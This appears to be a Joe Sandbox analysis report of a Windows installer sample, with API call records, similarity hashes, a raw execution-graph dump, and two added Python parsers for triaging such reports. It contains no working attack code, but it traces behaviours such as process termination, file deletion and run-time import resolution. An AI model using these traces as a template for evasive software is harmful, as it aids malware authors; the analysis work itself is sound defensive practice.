• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
• Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
• Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
• Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: CloseHandlelstrlenwvsprintf
• String ID: RMDir: RemoveDirectory invalid input("")
• API String ID: 3509786178-2769509956
• Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
• Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
• Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
• Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
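Every record in this section has the same plain-text layout: an APIs list (one call per line, with the call-site address after ref: and nested Part of subcall function entries), an optional Strings list with xrefs, the memory-dump provenance, and a Similarity block whose API ID, API String ID, Opcode ID and fuzzy hashes are what let a function be matched against other reports. As an added example that is not part of the Joe Sandbox report, the Python below parses that layout into records, indexes them by a Similarity field, and pulls out the functions that resolve imports at run time through GetProcAddress (the behaviour behind the report's "dynamically determine API calls" signature). The text layout it assumes is the one shown on this page; SAMPLE is constructed from three of the records above, abridged.

```python
"""Parse the per-function 'APIs / Strings / Similarity' records of a Joe Sandbox
report into objects and index them by the Similarity fields, so a function can be
matched across reports by Opcode ID or API String ID. Added example, not Joe
Sandbox code; SAMPLE is constructed from three records on this page, abridged."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

SAMPLE = """\
APIs
• IsWindowVisible.USER32(?), ref: 0040492E
• CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
Strings
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• API String ID: 2883127279-0
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
"""

API_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function ([0-9A-Fa-f]+): (.*)$")
STRING_RE = re.compile(r"^(.*), xrefs: ([0-9A-Fa-f]+)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                        # address of the call site
    subcall_of: str | None = None   # set for 'Part of subcall function' entries

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref)
    similarity: dict[str, str] = field(default_factory=dict)      # API ID, Opcode ID, hashes

def _parse_call(text: str, subcall_of: str | None = None) -> ApiCall:
    m = API_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised API line: {text!r}")
    name, module, args, ref = m.groups()
    # Naive split: a string argument that itself contains a comma would be split too.
    return ApiCall(name, module, args.split(","), ref, subcall_of)

def parse_records(text: str) -> list[FunctionRecord]:
    """Each 'APIs' header opens a new record; bullet lines go to the current section."""
    records: list[FunctionRecord] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
        elif current is not None and line.startswith("•"):
            item = line[1:].strip()
            if section == "APIs":
                m = SUBCALL_RE.match(item)
                current.calls.append(_parse_call(m.group(2), m.group(1)) if m else _parse_call(item))
            elif section == "Strings":
                m = STRING_RE.match(item)
                if m:
                    current.strings.append((m.group(1), m.group(2)))
            elif section == "Similarity":   # 'Key: value' lines; an empty String ID stays ""
                key, _, value = item.partition(":")
                current.similarity[key.strip()] = value.strip()
    return records

def index_by(records: list[FunctionRecord], key: str) -> dict[str, list[FunctionRecord]]:
    """Group records by one Similarity field ('Opcode ID', 'API String ID', ...)."""
    idx: dict[str, list[FunctionRecord]] = {}
    for r in records:
        idx.setdefault(r.similarity.get(key, ""), []).append(r)
    return idx

def dynamic_resolvers(records: list[FunctionRecord]) -> list[FunctionRecord]:
    """Records that resolve an export at run time via GetProcAddress."""
    return [r for r in records if any(c.name == "GetProcAddress" for c in r.calls)]
```

Feed it the saved text of a report section rather than SAMPLE to get the full record list; indexing two reports by Opcode ID and intersecting the keys shows which functions they have in common, and filtering on the APIs list (as dynamic_resolvers does) is a quick way to locate the code behind a given signature. The argument split is deliberately naive, so a string argument that contains a comma is split as well.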
APIs
• lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
• lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
• CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
• lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
Memory Dump Source
• Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
• Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
• Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Execution Graph

Execution Coverage: 4.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.1%
Total number of Nodes: 2000
Total number of Limit Nodes: 88
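The execution_graph data in this section is Joe Sandbox's interactive call graph flattened into one token stream: each node is a 5-digit node ID followed by a 6-hex-digit function address and an optional label (a Windows API name, a CRT internal, or a call count such as "59 API calls"), and each edge is written as "id->id". That is unreadable as text, but it is easy to parse back into a graph. The following parser is an added example, not code from Joe Sandbox; the token grammar it assumes is inferred from the extracted text on this page rather than from any Joe Sandbox documentation, and the sample graph it embeds is a constructed excerpt of a few node/edge runs copied from this report (the registry-read chain at 0x511298, plus two nodes that carry only call-count labels).

```python
"""Parse a Joe Sandbox execution_graph token stream (as extracted to plain text)
into nodes and edges, then answer two triage questions: which symbols are
reachable from a given node, and which function addresses reference a symbol.

Format assumptions (inferred from the extracted report text, not from any
Joe Sandbox documentation): a node is "<5-digit id> <6-hex-digit address>
[label words]", an edge is "<id>-><id>", and label words such as
"59 API calls" or "5 library calls" are call counts rather than symbols.
"""
import re
from collections import defaultdict

EDGE_RE = re.compile(r"^(\d{5})->(\d{5})$")
NODE_ID_RE = re.compile(r"^\d{5}$")
ADDR_RE = re.compile(r"^[0-9a-f]{6}$")
# Label words that describe call counts, not symbols.
COUNT_WORDS = {"API", "calls", "library"}

# Constructed excerpt: node/edge runs copied from this report's graph.
SAMPLE_GRAPH = (
    "execution_graph "
    "97838 521207 97839 530fe6 Mailbox 59 API calls 97838->97839 "
    "97775 531036 97805 538701 58 API calls _free 97775->97805 "
    "97843 511256 97847 511284 97843->97847 97848 511291 97847->97848 "
    "97849 511275 97847->97849 97848->97849 97850 511298 RegOpenKeyExW 97848->97850 "
    "97849->97832 97850->97849 97851 5112b2 RegQueryValueExW 97850->97851 "
    "97852 5112d3 97851->97852 97853 5112e8 RegCloseKey 97851->97853 "
    "97852->97853 97853->97849"
)


def parse_execution_graph(text):
    """Return (nodes, edges).

    nodes: id -> {"addr": hex string, "symbols": [label words]}
    edges: id -> set of successor ids (may reference ids with no node record,
           because the stream lists some edges before their target node).
    """
    tokens = text.split()
    if tokens and tokens[0] == "execution_graph":
        tokens = tokens[1:]
    nodes = {}
    edges = defaultdict(set)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[edge.group(1)].add(edge.group(2))
            i += 1
            continue
        # A node record starts with an id immediately followed by an address.
        if NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "symbols": []}
            i += 2
            continue
        # Anything else is label text belonging to the most recent node;
        # drop bare numbers and the count words ("59 API calls").
        if current is not None and not tok.isdigit() and tok not in COUNT_WORDS:
            nodes[current]["symbols"].append(tok)
        i += 1
    return nodes, dict(edges)


def reachable_symbols(nodes, edges, root):
    """Depth-first walk from root; return the sorted set of symbols on every
    node reached, including root. Unknown ids are traversed but contribute
    no symbols."""
    seen = {root}
    stack = [root]
    symbols = set()
    while stack:
        node = stack.pop()
        symbols.update(nodes.get(node, {}).get("symbols", []))
        for nxt in edges.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return sorted(symbols)


def nodes_with_symbol(nodes, symbol):
    """Sorted list of function addresses whose node label names the symbol."""
    return sorted(info["addr"] for info in nodes.values() if symbol in info["symbols"])


if __name__ == "__main__":
    graph_nodes, graph_edges = parse_execution_graph(SAMPLE_GRAPH)
    print(f"{len(graph_nodes)} nodes, {sum(len(v) for v in graph_edges.values())} edges")
    for sym in reachable_symbols(graph_nodes, graph_edges, "97847"):
        print(f"  {sym:<18} at {', '.join(nodes_with_symbol(graph_nodes, sym))}")
```

Run it against the full execution_graph string copied from the report to get, for any node, the set of Windows APIs that its subtree can reach; starting from node 97847 in the excerpt yields the RegOpenKeyExW / RegQueryValueExW / RegCloseKey chain, i.e. a single registry value read rooted at 0x511284. Note that the addresses in this graph are virtual addresses from the dumped module, not file offsets.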
[Execution graph rendering omitted: the interactive graph was extracted as a flat token stream of node IDs, function addresses and "a->b" edges (for example "97850 511298 RegOpenKeyExW 97848->97850"), which is not readable as text. The symbols that survive on the graph nodes, grouped by theme:
• Heap, CRT start-up and locking: RtlAllocateHeap, RtlFreeHeap, GetLastError, DecodePointer, EncodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, RaiseException, GetModuleHandleExW, GetProcAddress, ExitProcess (with the CRT internals __getptd_noexit, _free, __NMSG_WRITE, ___crtCorExitProcess, __alloc_osfhnd, __realloc_crt, __lock, _doexit, __cinit, __wsetenvp, _memmove, __woutput_l, __wopenfile, __wcstoi64, _iswctype, __i64tow, __itow, _wcscpy, __wtof_l, wcstoxq)
• Registry read: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
• Network and ICMP ping: WSAStartup, inet_addr, gethostbyname, IcmpCreateFile, IcmpSendEcho, IcmpCloseHandle, WSACleanup, WideCharToMultiByte
• Process enumeration and waiting on a child process: CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, WaitForSingleObject, GetExitCodeProcess, CloseHandle
• Environment, string and COM helpers: GetEnvironmentVariableW, CharUpperBuffW, GetStringTypeW, VariantClear
• Window message loop and timing: PeekMessageW, GetMessageW, TranslateMessage, TranslateAcceleratorW, DispatchMessageW, LockWindowUpdate, DestroyWindow, Sleep, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency
Many nodes carry only a call-count label ("59 API calls", "274 API calls") or the internal function name Mailbox; the first node listed is 97763 at address 54dcb4.]
98791->98802 98792 51a775 98892 57a48d 89 API calls 4 library calls 98792->98892 98796 5527f9 98796->98720 98799 521bcc 59 API calls 98799->98802 98801 57a48d 89 API calls 98801->98802 98802->98786 98802->98788 98802->98791 98802->98792 98802->98799 98802->98801 98803 51a058 98802->98803 98889 567aad 59 API calls 98802->98889 98890 58ccac 274 API calls 98802->98890 98891 58bc26 274 API calls Mailbox 98802->98891 98893 515190 59 API calls Mailbox 98802->98893 98894 589ab0 274 API calls Mailbox 98802->98894 98803->98720 98895 58d1c6 98804->98895 98806 58e630 98806->98720 98808 514d37 84 API calls 98807->98808 98809 57c286 98808->98809 98998 574005 98809->98998 98811 57c28e 98812 57c292 GetLastError 98811->98812 98813 57c2a7 98811->98813 98812->98813 98813->98720 98814->98655 98815->98659 98816->98720 98817->98660 98818->98660 98819->98660 98820->98720 98821->98720 98822->98720 98823->98720 98824->98720 98825->98702 98826->98702 98827->98702 98828->98702 98829->98702 98830->98702 98832 5135e2 98831->98832 98834 5135b0 98831->98834 98832->98760 98833 5135d5 IsDialogMessageW 98833->98832 98833->98834 98834->98832 98834->98833 98835 54d273 GetClassLongW 98834->98835 98835->98833 98835->98834 98837 5153b0 274 API calls 98836->98837 98838 51951f 98837->98838 98839 552001 98838->98839 98853 519527 _memmove 98838->98853 98879 515190 59 API calls Mailbox 98839->98879 98841 5522c0 98885 57a48d 89 API calls 4 library calls 98841->98885 98843 5522de 98843->98843 98844 519583 98844->98770 98845 519944 98847 530fe6 Mailbox 59 API calls 98845->98847 98846 51986a 98848 5522b1 98846->98848 98849 51987f 98846->98849 98850 5196e3 _memmove 98847->98850 98884 58a983 59 API calls 98848->98884 98851 530fe6 Mailbox 59 API calls 98849->98851 98855 51970e 98850->98855 98857 530fe6 Mailbox 59 API calls 98850->98857 98869 519741 98850->98869 98863 51977d 98851->98863 98853->98841 98853->98844 98853->98845 98854 530fe6 59 API calls Mailbox 98853->98854 98856 5196cf 98853->98856 98853->98869 
98854->98853 98855->98869 98871 51cca0 98855->98871 98856->98845 98858 5196dc 98856->98858 98857->98855 98860 530fe6 Mailbox 59 API calls 98858->98860 98859 5522a0 98883 57a48d 89 API calls 4 library calls 98859->98883 98860->98850 98863->98770 98865 552278 98882 57a48d 89 API calls 4 library calls 98865->98882 98867 552253 98881 57a48d 89 API calls 4 library calls 98867->98881 98869->98846 98869->98859 98869->98863 98869->98865 98869->98867 98880 518180 274 API calls 98869->98880 98870->98772 98872 51cd02 98871->98872 98873 51ccda 98871->98873 98875 5153b0 274 API calls 98872->98875 98876 51cce0 98872->98876 98877 554971 98872->98877 98874 519c80 274 API calls 98873->98874 98873->98876 98874->98876 98875->98877 98876->98869 98877->98876 98886 57a48d 89 API calls 4 library calls 98877->98886 98879->98845 98880->98869 98881->98863 98882->98863 98883->98863 98884->98841 98885->98843 98886->98876 98887->98802 98888->98802 98889->98802 98890->98802 98891->98802 98892->98796 98893->98802 98894->98802 98896 514d37 84 API calls 98895->98896 98897 58d203 98896->98897 98921 58d24a Mailbox 98897->98921 98933 58de8e 98897->98933 98899 58d4a2 98900 58d617 98899->98900 98904 58d4b0 98899->98904 98982 58dfb1 92 API calls Mailbox 98900->98982 98903 58d626 98903->98904 98905 58d632 98903->98905 98946 58d057 98904->98946 98905->98921 98906 514d37 84 API calls 98923 58d29b Mailbox 98906->98923 98911 58d4e9 98961 530e38 98911->98961 98914 58d51c 98917 5147be 59 API calls 98914->98917 98915 58d503 98981 57a48d 89 API calls 4 library calls 98915->98981 98919 58d528 98917->98919 98918 58d50e GetCurrentProcess TerminateProcess 98918->98914 98920 514540 59 API calls 98919->98920 98922 58d53e 98920->98922 98921->98806 98924 514230 59 API calls 98922->98924 98932 58d565 98922->98932 98923->98899 98923->98906 98923->98921 98979 57fc0d 59 API calls 2 library calls 98923->98979 98980 58d6c8 61 API calls 2 library calls 98923->98980 98926 58d554 98924->98926 98925 58d68d 98925->98921 98929 
58d6a1 FreeLibrary 98925->98929 98927 58dd32 107 API calls 98926->98927 98927->98932 98928 514230 59 API calls 98928->98932 98929->98921 98931 51523c 59 API calls 98931->98932 98932->98925 98932->98928 98932->98931 98966 58dd32 98932->98966 98934 521aa4 59 API calls 98933->98934 98935 58dea9 CharLowerBuffW 98934->98935 98983 56f903 98935->98983 98939 521207 59 API calls 98940 58dee2 98939->98940 98941 521462 59 API calls 98940->98941 98943 58def9 98941->98943 98942 58df41 Mailbox 98942->98923 98944 521981 59 API calls 98943->98944 98945 58df05 Mailbox 98944->98945 98945->98942 98990 58d6c8 61 API calls 2 library calls 98945->98990 98947 58d072 98946->98947 98951 58d0c7 98946->98951 98948 530fe6 Mailbox 59 API calls 98947->98948 98949 58d094 98948->98949 98950 530fe6 Mailbox 59 API calls 98949->98950 98949->98951 98950->98949 98952 58e139 98951->98952 98953 58e362 Mailbox 98952->98953 98960 58e15c _strcat _wcscpy __wsetenvp 98952->98960 98953->98911 98954 515087 59 API calls 98954->98960 98955 5150d5 59 API calls 98955->98960 98956 51502b 59 API calls 98956->98960 98957 514d37 84 API calls 98957->98960 98958 53593c 58 API calls std::exception::_Copy_str 98958->98960 98960->98953 98960->98954 98960->98955 98960->98956 98960->98957 98960->98958 98993 575e42 61 API calls 2 library calls 98960->98993 98963 530e4d 98961->98963 98962 530ee5 Sleep 98965 530eb3 98962->98965 98963->98962 98964 530ed3 CloseHandle 98963->98964 98963->98965 98964->98965 98965->98914 98965->98915 98967 58dd4a 98966->98967 98978 58dd66 98966->98978 98968 58de1b 98967->98968 98969 58dd51 98967->98969 98970 58dd72 98967->98970 98967->98978 98997 577b1d 105 API calls Mailbox 98968->98997 98994 575a57 61 API calls 2 library calls 98969->98994 98996 514f98 59 API calls Mailbox 98970->98996 98971 58de41 98971->98932 98974 532f85 _free 58 API calls 98974->98971 98976 58dd5b 98995 514f98 59 API calls Mailbox 98976->98995 98978->98971 98978->98974 98979->98923 98980->98923 98981->98918 98982->98903 98984 
56f92e __wsetenvp 98983->98984 98987 56f963 98984->98987 98988 56fa14 98984->98988 98989 56f96d 98984->98989 98987->98989 98991 5214db 61 API calls 98987->98991 98988->98989 98992 5214db 61 API calls 98988->98992 98989->98939 98989->98945 98990->98942 98991->98987 98992->98988 98993->98960 98994->98976 98995->98978 98996->98978 98997->98978 98999 521207 59 API calls 98998->98999 99000 574024 98999->99000 99001 521207 59 API calls 99000->99001 99002 57402d 99001->99002 99003 521207 59 API calls 99002->99003 99004 574036 99003->99004 99022 530284 99004->99022 99009 57405c 99011 530119 59 API calls 99009->99011 99010 521900 59 API calls 99010->99009 99012 574070 FindFirstFileW 99011->99012 99013 5740fc FindClose 99012->99013 99015 57408f 99012->99015 99018 574107 Mailbox 99013->99018 99014 5740d7 FindNextFileW 99014->99015 99015->99013 99015->99014 99016 521c9c 59 API calls 99015->99016 99017 5217e0 59 API calls 99015->99017 99034 521900 99015->99034 99016->99015 99017->99015 99018->98811 99021 5740f3 FindClose 99021->99018 99041 541b70 99022->99041 99025 5302b0 99027 521821 59 API calls 99025->99027 99026 5302cd 99028 5219e1 59 API calls 99026->99028 99029 5302bc 99027->99029 99028->99029 99043 52133d 99029->99043 99032 574fec GetFileAttributesW 99033 57404a 99032->99033 99033->99009 99033->99010 99035 55f534 99034->99035 99036 521914 99034->99036 99038 521c7e 59 API calls 99035->99038 99047 5218a5 99036->99047 99040 55f53f __wsetenvp _memmove 99038->99040 99039 52191f DeleteFileW 99039->99014 99039->99021 99042 530291 GetFullPathNameW 99041->99042 99042->99025 99042->99026 99044 52134b 99043->99044 99045 521981 59 API calls 99044->99045 99046 52135b 99045->99046 99046->99032 99048 5218b4 __wsetenvp 99047->99048 99049 5218c5 _memmove 99048->99049 99050 521c7e 59 API calls 99048->99050 99049->99039 99051 55f4f1 _memmove 99050->99051 99053 513b3f 99052->99053 99059 513b67 99052->99059 99054 513b4d 99053->99054 99055 513b31 59 API calls 99053->99055 99056 513b53 
99054->99056 99057 513b31 59 API calls 99054->99057 99055->99054 99056->99059 99062 515190 59 API calls Mailbox 99056->99062 99057->99056 99059->98731 99060->98732 99061->98728 99062->99059 99063->98752 99064->98323 99065->98320 99066->98075 99067->98074 99068->98070 99069->98074 99070->98069 99071->98090 99072->98099 99073->98103 99074->98099 99075->98099 99077 530fe6 Mailbox 59 API calls 99076->99077 99078 5240e0 99077->99078 99079 521c7e 59 API calls 99078->99079 99080 5240ed 99079->99080 99080->98117 99082 524085 99081->99082 99083 52404e 99081->99083 99092 523f20 59 API calls Mailbox 99082->99092 99085 530fe6 Mailbox 59 API calls 99083->99085 99087 524055 WideCharToMultiByte 99085->99087 99086 524077 99086->98121 99091 523f79 59 API calls 2 library calls 99087->99091 99089->98113 99090->98118 99091->99086 99092->99086 99094 577d85 99093->99094 99112 577ea5 99093->99112 99095 577dc5 99094->99095 99096 577d9d 99094->99096 99101 577ddc 99094->99101 99097 530fe6 Mailbox 59 API calls 99095->99097 99096->99095 99099 577dad 99096->99099 99098 577dbb Mailbox _memmove 99097->99098 99109 530fe6 Mailbox 59 API calls 99098->99109 99107 530fe6 Mailbox 59 API calls 99099->99107 99100 577df9 99100->99098 99102 577e24 99100->99102 99103 577e32 99100->99103 99101->99100 99104 530fe6 Mailbox 59 API calls 99101->99104 99105 530fe6 Mailbox 59 API calls 99102->99105 99106 530fe6 Mailbox 59 API calls 99103->99106 99104->99100 99105->99098 99108 577e38 99106->99108 99107->99098 99114 577a26 59 API calls Mailbox 99108->99114 99109->99112 99111 577e44 99113 52402a 61 API calls 99111->99113 99112->98136 99113->99098 99114->99111 99116 577cf1 99115->99116 99117 530fe6 Mailbox 59 API calls 99116->99117 99118 577cf8 99117->99118 99121 576135 99118->99121 99120 577d3b Mailbox 99120->98142 99122 521aa4 59 API calls 99121->99122 99123 576148 CharLowerBuffW 99122->99123 99128 57615b 99123->99128 99124 521609 59 API calls 99124->99128 99125 576195 99126 5761a7 99125->99126 99129 521609 59 API 
calls 99125->99129 99127 530fe6 Mailbox 59 API calls 99126->99127 99132 5761d5 99127->99132 99128->99124 99128->99125 99138 576165 _memset Mailbox 99128->99138 99129->99126 99134 5761f4 99132->99134 99154 576071 59 API calls 99132->99154 99133 576233 99135 530fe6 Mailbox 59 API calls 99133->99135 99133->99138 99139 576292 99134->99139 99136 57624d 99135->99136 99137 530fe6 Mailbox 59 API calls 99136->99137 99137->99138 99138->99120 99140 521207 59 API calls 99139->99140 99141 5762c4 99140->99141 99142 521207 59 API calls 99141->99142 99143 5762cd 99142->99143 99144 521207 59 API calls 99143->99144 99147 5762d6 _wcscmp 99144->99147 99145 5765ab Mailbox 99145->99133 99146 533836 GetStringTypeW 99146->99147 99147->99145 99147->99146 99148 521821 59 API calls 99147->99148 99149 52153b 59 API calls 99147->99149 99151 576292 60 API calls 99147->99151 99152 5337ba 59 API calls 99147->99152 99153 521c9c 59 API calls 99147->99153 99155 53385c GetStringTypeW _iswctype 99147->99155 99148->99147 99149->99147 99151->99147 99152->99147 99153->99147 99154->99132 99155->99147 99157 530fe6 Mailbox 59 API calls 99156->99157 99158 515285 99157->99158 99159 515294 99158->99159 99160 521a36 59 API calls 99158->99160 99159->98147 99160->99159 99162 533139 99161->99162 99163 5331ae 99161->99163 99170 53315e 99162->99170 99189 538d58 58 API calls __getptd_noexit 99162->99189 99191 5331c0 60 API calls 3 library calls 99163->99191 99166 5331bb 99166->98155 99167 533145 99190 538fe6 9 API calls __woutput_l 99167->99190 99169 533150 99169->98155 99170->98155 99172 5259fe _memset 99171->99172 99192 525800 99172->99192 99175 525a83 99177 525ab9 Shell_NotifyIconW 99175->99177 99178 525a9d Shell_NotifyIconW 99175->99178 99179 525aab 99177->99179 99178->99179 99196 5256f8 99179->99196 99181 525ab2 99181->98155 99183 525b25 99182->99183 99184 525ad5 _memset 99182->99184 99183->98155 99185 525af4 Shell_NotifyIconW 99184->99185 99185->99183 99186->98155 99187->98155 99188->98155 99189->99167 
99190->99169 99191->99166 99193 525810 99192->99193 99194 52581c 99192->99194 99193->99175 99226 5734dd 62 API calls _W_store_winword 99193->99226 99194->99193 99195 525821 DestroyIcon 99194->99195 99195->99193 99197 525715 99196->99197 99217 5257fa Mailbox 99196->99217 99198 52162d 59 API calls 99197->99198 99199 525723 99198->99199 99200 525730 99199->99200 99201 560c4c LoadStringW 99199->99201 99202 521821 59 API calls 99200->99202 99204 560c66 99201->99204 99203 525745 99202->99203 99205 525752 99203->99205 99211 560c74 99203->99211 99206 521c9c 59 API calls 99204->99206 99205->99204 99207 525760 99205->99207 99213 525778 _memset _wcscpy 99206->99213 99208 521900 59 API calls 99207->99208 99209 52576a 99208->99209 99210 5217e0 59 API calls 99209->99210 99210->99213 99212 560cb7 Mailbox 99211->99212 99211->99213 99214 521207 59 API calls 99211->99214 99228 5338c8 83 API calls 2 library calls 99212->99228 99215 5257e0 Shell_NotifyIconW 99213->99215 99216 560c9e 99214->99216 99215->99217 99227 570252 60 API calls Mailbox 99216->99227 99217->99181 99220 560ca9 99222 5217e0 59 API calls 99220->99222 99221 560cd6 99223 521900 59 API calls 99221->99223 99222->99212 99224 560ce7 99223->99224 99225 521900 59 API calls 99224->99225 99225->99213 99226->99175 99227->99220 99228->99221 99229->98176 99230->98180 99231->98185 99232->98196 99233->98200 99234 517357 99235 5178f5 99234->99235 99236 517360 99234->99236 99238 516fdb Mailbox 99235->99238 99245 5687f9 59 API calls _memmove 99235->99245 99236->99235 99237 514d37 84 API calls 99236->99237 99239 51738b 99237->99239 99239->99235 99240 51739b 99239->99240 99242 521680 59 API calls 99240->99242 99242->99238 99243 54f91b 99244 521c9c 59 API calls 99243->99244 99244->99238 99245->99243 99246 511016 99251 525ce7 99246->99251 99249 532f70 __cinit 67 API calls 99250 511025 99249->99250 99252 530fe6 Mailbox 59 API calls 99251->99252 99253 525cef 99252->99253 99254 51101b 99253->99254 99258 525f39 99253->99258 99254->99249 99259 
525f42 99258->99259 99261 525cfb 99258->99261 99260 532f70 __cinit 67 API calls 99259->99260 99260->99261 99262 525d13 99261->99262 99263 521207 59 API calls 99262->99263 99264 525d2b GetVersionExW 99263->99264 99265 521821 59 API calls 99264->99265 99266 525d6e 99265->99266 99267 521981 59 API calls 99266->99267 99272 525d9b 99266->99272 99268 525d8f 99267->99268 99269 52133d 59 API calls 99268->99269 99269->99272 99270 525e00 GetCurrentProcess IsWow64Process 99271 525e19 99270->99271 99274 525e98 GetSystemInfo 99271->99274 99275 525e2f 99271->99275 99272->99270 99273 561098 99272->99273 99276 525e65 99274->99276 99286 5255f0 99275->99286 99276->99254 99279 525e41 99281 5255f0 2 API calls 99279->99281 99280 525e8c GetSystemInfo 99282 525e56 99280->99282 99283 525e49 GetNativeSystemInfo 99281->99283 99282->99276 99284 525e5c FreeLibrary 99282->99284 99283->99282 99284->99276 99287 525619 99286->99287 99288 5255f9 LoadLibraryA 99286->99288 99287->99279 99287->99280 99288->99287 99289 52560a GetProcAddress 99288->99289 99289->99287 99290 51107d 99295 522fc5 99290->99295 99292 51108c 